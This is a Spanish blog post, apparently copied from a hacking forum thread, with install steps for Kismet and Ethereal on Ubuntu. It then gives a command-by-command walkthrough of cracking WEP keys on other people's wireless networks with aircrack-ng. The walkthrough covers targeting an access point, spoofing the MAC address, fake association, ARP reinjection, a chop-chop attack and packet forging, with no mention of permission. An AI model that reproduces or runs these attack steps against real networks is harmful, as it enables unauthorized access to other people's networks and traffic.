Datos personales

Mi foto
Elige la vida. Elige un empleo. Elige una carrera. Elige una familia. Elige un televisor grande que te cagas. Elige lavadoras, coches, equipos de compact-disk y abre latas electricos. Elige la salud, colesterol bajo y seguros dentales. Elige pagar hipotecas a interés fijo, Elige un piso piloto. Elige a tus amigos. Elige ropa deportiva y maletas a juego. Elige pagar a plazos un traje de marca en una amplia gama de putos tejidos. Elige el bricolaje y preguntarte quien coño eres los domingos por la mañana. Elige sentarte en el sofá a ver teleconcursos que embotan la mente y aplastan el espíritu, mientras llenas tu boca de puta comida basura. Elige pudrirte de viejo, cagandote y meandote encima en un asilo miserable, siendo una carga para los niñatos egoístas y hechos polvo, que has engendrado para reemplazarte. Elige tu futuro. Elige la vida. Pero por que iba yo a querer hacer algo así?? Yo elegí no elegir la vida, yo elegí otra cosa, ESCALAR!

jueves, 16 de agosto de 2007

Continuación

Instalacion de kismet en Ubuntu

Nos vamos a Synaptic y actualizamos estas librerias :


os asegurais de que esten todas marcadas .

cerras y abris una terminal :

Código:
wget http://www.kismetwireless.net/code/kismet-2006-04-R1.tar.gz
tar zxvf kismet-2006-04-R1.tar.gz
cd kismet-2006-04-R1/
sudo ./configure
sudo make dep
sudo make
sudo make install

con eso ya esta instalado ,ahora hay que configurarlo :
en la terminal ...

Código:
sudo gedit /usr/local/etc/kismet.conf

en la linea

Código:
# User to setid to (should be your normal user)
suiduser=tu_user <------ en mi caso blunt

y poco mas abajo ..

para que funcione en modo monitor (habitual):

Citar
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
source=ipw2200,eth1,ipw2200

para que funcione en modo promiscuo (gracias a Fok) :

seria editar la misma linea ,pero de esta manera ...

Citar
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
source=ipwlivetap,eth1,ipw2200_rtap

mas aki : http://foro.elhacker.net/index.php/topic,139111.msg665116.html#msg665116

lo poneis segun esta .

ya lo siguiente es desde la terminal :

Código:
sudo kismet


espero que al menos esto os entretenga smiley

si ves erratas ....

saludos


___________________________________________________________


Instalacion de Ethereal
[/size][/color]

Continuamos instalando programas utilies para nuestros propositos , Ethereal es un programa basico para este tema y he decidido incluirlo en el manual , tiene bastantes dependencias para ser instalado en Ubuntu , pero en unos cuantos pasos lo tendremos corriendo en nuestro sistema ,a lio:

Abrimos el gestor de paquetes Synaptic y actualizamos las siguientes librerias de la misma forma que hicimos con kismet:

libpcap-dev
libpcre3-dev
libkrb53
libadns1-dev
libbeecrypt6-dev
libcurl3-gnutls-dev

Una vez hecho esto abrimos una terminal y nos dirigimos a nuestro directorio personal.Ahi ,podemos crear una carpeta llamada 'herramientas' por ejemplo (por tener las cosas ordenadas) y nos introducimos en ella :

Código:
cd /home/personal/
mkdir herramientas
cd /herramientas

bajamos la aplicacion:
Código:
wget http://www.ethereal.com/distribution/ethereal-0.99.0.tar.gz


y procedemos a instalar :

descomprimimos el tar ..

Código:
tar zxvf ethereal-0.99.0.tar.gz

entramos en el directorio creado...

Código:
cd ethereal-0.99.0/

instalamos..


Código:
sudo ./configure
sudo make
sudo make install

hecho esto ya lo tenemos listo para ejecutar ,desde la consola :

Código:
sudo ethereal


saludos

_____________________________________________________________________________________________

Dados los problemas que tienen 'algunos' en instalar las headers y build-essentials al carecer de internet en los primeros pasos de la instalacion , he decidido incluir su instalacion desde el cd de instalacion :

Instalacion de kernel-headers y build-essentials desde cd de instalacion
[/size][/color]

para instalar las headers o build essentials NO hace falta tener inet , solo te hace falta el cd de instalacion , una vez arrancado el sistema , introduces el cd , y te aparecera esta imagen :



haces click en iniciar gestor de paketes ...
click en buscar :

buscas : headers

seleccionas las que correspondan a tu kernel , esto lo averiguas haciendo en la terminal :
Código:
 uname -r

y aplicas los cambios ..

lo mismo con build-essentials ...

despues solo tienes que bajarte el driver de tu dispositivo e instalarlo .. con el tipico sudo make y sudo make install ... suponiendo que no te de errores y funcione en ubuntu ese driver ..

enlaces para no perder :
http://foro.elhacker.net/index.php/topic,139111.msg665648.html#msg665648
http://www.bluntmen.com/ipw2200-1.1.4-inject.patch

___________________________________________________________________

Extension de uso de la suite aircrack-ng con ipw2200
[/color][/size]


Ataque con cliente conectado :

para sniffar en busca de redes :
Código:
sudo airodump-ng rtap0
esto sniffa en todos los canales para buscar el ap objetivo.
una vez localizado , copiamos el BSSID del ap , la MAC del cliente (STATION) el canal y hacemos lo siguiente :
Código:
sudo airodump-ng -b bssid -c canal --ivs -w pruebas rtap0
esto sniffa unicamente el trafico de el ap seleccionado en el canal seleccionado.

reinyeccion de ARP's con cliente , en otra consola hacemos lo siguiente:
Código:
sudo aireplay-ng --ipwsys  -3  -b bssid_ap -h mac_station -x 1024 -g 1000000 -i rtap0 eth1

una vez tengais mas de 500.000 datas (ivs) podeis ejecutar en otra consola :
Código:
sudo aircrack-ng  *.ivs

o esto por poner una opcion bastante efectiva :


Código:
sudo aircrack-ng  *.ivs -y


ya sabeis , un par de minutos , y si no suelta la clave ...mas ivs .

Ataque sin cliente asociado:

lo primero , cambiamos la MAC :
Código:
sudo ifconfig eth1 down
sudo ifconfig eth1 hw ether 00:11:22:33:44:55
sudo ifconfig eth1 up

ahora sniffamos todos los canales en busca del ap a vulnerar:
Código:
sudo airodump-ng rtap0

copiamos la MAC del ap (BSSID) , y nos ponemos a sniffa esa MAC en el canal en el que se encuentra :
Código:
sudo airodump-ng -b bssid_ap -c canal --ivs -w pruebas rtap0

ahora en otra consola nos asociamos al ap :
Código:
sudo iwconfig eth1 essid "essid del ap" key FFFFFFFFFFFFFF

y lanzamos aireplay-ng con nuestra MAC :
Código:
sudo aireplay-ng --ipwsys -3 -b bssid_ap -h 00:11:22:33:44:55 -x 1024 -g 1000000 -i rtap0 eth1


y a esperar que caiga el ARP .. y empiecen a subir los data..
cuando haya suficientes data para lanzar el aircrack-ng , pues igual que en el anterior caso , en otra consola:
Código:
sudo aircrack-ng *.ivs

ó :
Código:
sudo aircrack-ng  *.ivs -y

Ataque chop-chop sin cliente

citado textualmente del siguiente post de este hilo , explicado a la perfeccion por redkey :
http://foro.elhacker.net/index.php/topic,139111.msg689749.html#msg689749

Probado y funcionando , si bien hay que tener en cuenta las siguientes premisas apuntadas por thefkboss en este post :
http://foro.elhacker.net/index.php/topic,139111.msg690282.html#msg690282

ya que no todos los ap's tienen el mismo rango de ip's ..

Primero cambiamos la MAC de nuestro dispositivo:
Código:
fconfig eth1 up hw ether 00:11:22:33:44:55
ifconfig rtap0 up

Ahora nos ponemos a ver con quien probamos:
Código:
airodump-ng rtap0

Y una vez fjado el objetivo cancelamos y volvemos a lanzar:
Código:
airodump-ng -b <>  -c <>  -w captura rtap0

Ahora generamos el xor necesario. No pregunta si queremos utilizar el paquete y decimos que si.
Código:
aireplay-ng --ipwsys -4 -a <> -h 00:11:22:33:44:55 -i rtap0 eth1


En otra ventana nos asociamos al AP:
Código:
iwconfig eth1 essid <>
iwconfig eth1 key FFFF-FFFF
Si nos hemos asociado bien, en la otra ventana se pondrá a generar el xor.

Generamos el paquete que vamos a reinyectar. Las ips son las que queramos.
Código:
arpforge-ng <> 1 <>  00:11:22:33:44:55 192.168.1.10 192.168.1.1 output.cap

Empezamos a meter el paquete generado:
Código:
aireplay-ng --ipwsys -2 -r output.cap eth1

Y Para finalizar el ataque 3:
Código:
aireplay-ng --ipwsys -3 -b <> -h 00:11:22:33:44:55 -x 100 -i rtap0 eth1



saludos
Publicado por en

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)